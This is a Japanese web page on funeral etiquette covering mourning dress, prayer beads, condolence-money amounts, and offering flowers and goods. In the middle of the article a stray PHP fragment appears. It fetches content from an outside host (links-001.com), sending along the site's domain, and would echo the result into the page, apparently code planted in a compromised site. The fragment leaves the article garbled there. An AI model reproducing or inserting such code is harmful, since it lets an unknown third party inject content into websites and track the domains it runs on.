前へ
次へ

葬儀マナーを学ぶときにできること

実際のところ、今は葬儀マナーを学ぶことができるコンテンツがかなり多くなってきたので、本格的に学びたい

more

葬儀マナーを知っておけばかなり変わる

良識ある社会人として見てもらうためには、葬儀マナーをしっかりと知っておくことも大きなポイントとなりま

more

すぐに葬儀マナーを身に付けたいなら

スピーディーに葬儀マナーを身に付けて、急なお葬式に対応できるようになりたいなら、しかるべき知識を養う

more

葬儀マナーを知りたい方へ

葬儀マナーを知りたい方へ、どんな事があるのかお教えします。
まず、服装があります。
通常、男性の方も女性の方もブラックフォーマルを着用します。
男性の場合には、白のワイシャツを着用、ネクタイも黒のフォーマル用のものを着用します。
もちろん、靴下や、靴もブラックのものを着用する事です。
女性の場合には、ワンピースを着用する事が多いですが、アンサンブルを着用しても構いません。
また、女性の場合、男性と違って、華美なネックレスやピアスなどをしない事です。
それから、靴やストッキングは黒のものを着用する事が葬儀マナーです。
また、髪飾りやバッグなども華美なものは避けて置くことです。
それから、葬儀マナーとして、数珠を用意する事です。
日本ではほとんどの場合は仏式が多いので、特に宗教、宗派が分からない場合でも数珠を持っていくことです。
また、お子さんが参列する際には、学生服がある場合には学生服がフォーマルになります。
乳児や、幼児の方が参列される場合には、黒っぽいワンピースや服装で参列する事です。
これらの事を知っておくと、葬儀マナーとして役立ちます。
それから、もっと知っておくと便利な事として、香典があります。
これは、遺族の方や、親族の方、それからご近所さんや友人知人など、故人との付き合いがあるかないか、それから会社関係などでお世話になった方なのかなどを踏まえて金額を知っておくことです。
親の場合には10万円、兄弟の場合には5万円、親戚などは1万円、会社関係などの場合には5000円から1万円程度です。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

それから、親族の方が亡くなられた場合には、香典だけでなく、供花や、供物などが必要なことを知っておきましょう。
供花の場合、大抵1対で依頼をします。
一対の場合には10000円程度かかります。
また、供物の場合にも一籠、10000円程度かかると考えておきましょう。
また、親族の葬儀に参列される場合、その日に初七日をする場合があるので事前に黒い水引のついた袋を用意しておくこと、それからお金を余分に用意しておくことです。

Page Top